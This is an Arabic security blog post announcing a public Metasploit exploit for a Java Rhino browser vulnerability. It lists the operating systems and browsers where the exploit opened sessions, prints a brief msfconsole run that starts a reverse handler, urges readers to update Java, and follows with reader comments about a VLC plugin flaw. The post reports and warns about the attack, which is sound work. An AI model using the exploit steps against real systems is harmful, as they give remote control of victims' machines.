ثغرة خطيرة في جافا تؤدي إلى اختراق انظمة تشغيل مختلفة

تم اليوم إضافة استغلال لثغرة خطيرة في جافا إلى مشروع ميتاسبلويت. الثغرة كانت متوفرة فقط في السوق السوداء وبشكل تجاري. ولكن الآن أصبحت في متناول الجميع. الثغرة موجودة في الاصدار السابع من جافا والاصدار السادس التحديث  السابع والعشرين. أحدث اصدارات جافا (الاصدار السابع التحديث الأول، والاصدار السادس التحديث التاسع والعشرين) تمّ فيها ترقيع الثغرة بالإضافة إلى 19 ثغرة أخرى.

بغض النظر عن نظام التشغيل أو المتصفح المستخدمان، تمكن مطوّروا الاستغلال من استغلال الثغرة واختراق الأنظمة التي تحتوي إصدارة جافا مصابة. وفيما يلي قائمة بالإنظمة التي تم اختبار الاختراق عليها:

أنظمة ويندوز


WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

نظام ابنتو (كمثال ولكن ينطبق على غيره ما ينطبق عليه)


Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories
Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin

أنظمة ماك او اس


OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

مثال على الاستغلال

msf exploit(handler) > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > info
msf exploit(java_rhino) > set URIPATH xxxx
msf exploit(java_rhino) > exploit

[*] Security For Arabs Exploit running as background job.

[*] Started reverse handler on 10.0.0.11:4444

[*] Using URL: hxxp://0.0.0.0:8080/xxxx

[*] Local IP: hxxp://10.0.0.11:8080/xxxx

[*] Server started.

إذا كنت تستخدم نسخة غير محدّثة من جافا فقم بتحديثها فوراً.

ننصح بزيارة هذا الرابط من اجل فحص الأمان في متصفحك بالإضافة إلى الملحقات ومن ضمنها جافا.

نبذة عن الكاتب

بشار ماجستير نظم معلومات. مهندس أنظمة يمتلك خبرة في إدارة أنظمة ويندوز ولينكس. باحث ومختصص في مجال أنظمة المعلومات، معالجة الحوادث الأمنيّة، تحليل الإختراقات الأمنيّة، وفحصوصات الاختراق. حاصل على العديد من الشهادات الأمنيّة. عضو في مجلس استشاريّي معهد سانز لأمن المعلومات.

التعليقات:

أضف تعليقاً | عدد التعليقات: (12)

  1. H4kr3m قال:

    ويتكرر نفس المسلسل مع هده المشاكل بارك الله فيك

  2. عبدالرحيم الفاخوري قال:

    أظن استخدام إضافة noscript يحمي من هذه المشكلة، أليس كذلك؟

    • بشار قال:

      صحيح. لكن تبقى المشكلة. NoScript فقط لفيرفوكس. والهندسة الاجتماعية سيقودان العديد للوقع في هذه الثغرة.

      شكراً لمرورك أخي عبد الرحيم

  3. محمد قال:

    مشكور اخي بشار على الخبر قمت بزيارة الموقع لزيادة الامان فاعطاني بجانب برنامج vlc multimedia-plugin
    insecure version
    وكذلك الرساله التالية

    File checked: /usr/lib/mozilla/plugins/libvlcplugin.so
    Installed File Version: 1.1.12
    Latest File Version: 1.1.12
    The latest version of this plugin has a known critical vulnerability, but there is no fix available yet from the vendor. Please exercise CAUTION when using the plugin. You can check back periodically and Qualys BrowserCheck will advise you when the vendor delivers a fixed version.
    http://www.videolan.org/security/sa1107.html

    فرجاء اخي المساعدة ماالذي يجب ان افعل
    وبارك الله فيك

    • أحمد ابوالعلا قال:

      اخي الكريم الرسالة تفيد ان اصدار vlc عندك مصاب بثغرة امنية و لكن الأصدار المنصب عندك هو ايضا اخر إصدار من الشركة حتى الأن كما تجد :
      Installed File Version: 1.1.12
      Latest File Version: 1.1.12

      اذاً اصدارك هو الأخير و لكن الموقع يوضح ان هذا الأصدار يحتوى على ثغرة و لا يوجد ترقيع الأن لها من مصنع البرنامجvendor لذلك لكي تقوم بحماية نفسك الأن من الممكن ان تقوم بأيقاف vlc plugin في firefox .

      تستيطع ذلك عن طريق الذهاب إلى قائمة tools ثم addons ثم plugins ثم ابحث عن vlc plugin و قوم بايقافه بالضغط على زر disable .

    • بشار قال:

      أخي محمد كما ذكر أحمد مشكوراً فإنه لا يوجد ترقيع حتى الان لبرنامج VLC مع اقرار الشركة بالثغرة. يفضل أن لا تقوم باستخدامه لحين اصدار ترقيع اما اذا كان لا بد من استخدامه فتأكد من مصدر الملفات التي تقوم بفتحها في VLC

  4. محمد قال:

    مشكوررين يااخوان على المساعدة وتم عمل ذلك في كل من المتصفحين فايرفوكس وجوجل كروم وتم ايقاف plugin ل vlc

    هل افهم يااخوان كذلك لو استعملت برنامج vlc لمشاهدة مقاطع فيديو او للافلام سيكون هناك مشكله من البرنامج

    • بشار قال:

      حسب القائمين على الموقع، استغلال هذه الثغرة يتمّ عندما يقوم المستخدم بإنشاء أحد الاتصالات التالية: HTTP web interface, HTTP output, RTSP output or RTSP VoD. لذلك مشاهدتك لفيديو عادي من مكتبتك لن يؤدي إن شاء الله لاستغلال الثغرة. الأمر الآخر الذي يجدر الانتباه إليه هو أن ثغرة برنامج VLC (ونحن هنا ابتعدنا عن الموضوع الاصلي) تؤدي الى انهيار النظام فقط ولا تؤدي الى سيطرة المخترق على النظام (على الأقل حتى الآن).

  5. محمد قال:

    اخ احمد ابو العلا والاخ بشار مشكوريين على المساعدة وعلى المعلومات المفيدة التي حقيقة استفدت منها ..بارك الله فيكم وفي كل ماتتعلموه وكل ماتقدموه
    مع فائق الاحترام والتقدير

  6. […] على استغلال لثغرة جافا الأخيرة والتي تناولنها في تقرير سابق. في حاول قام مستخدم مثبّت على حاسوبه اصدارة جافا تحتوي […]

  7. محمد اليوسف قال:

    كاتبين .. ننصح بزيارة هذا الرابط من اجل فحص الأمان في متصفحك بالإضافة إلى الملحقات ومن ضمنها جافا !!

    وين الرابط ؟

  8. أحمد ابوالعلا قال:

    الرابط موجود في كلمة “الرابط” لكن يبدو انك لم تلاحظه 🙂

    على كل حال هذا هو الرابط https://browsercheck.qualys.com

أكتب تعليق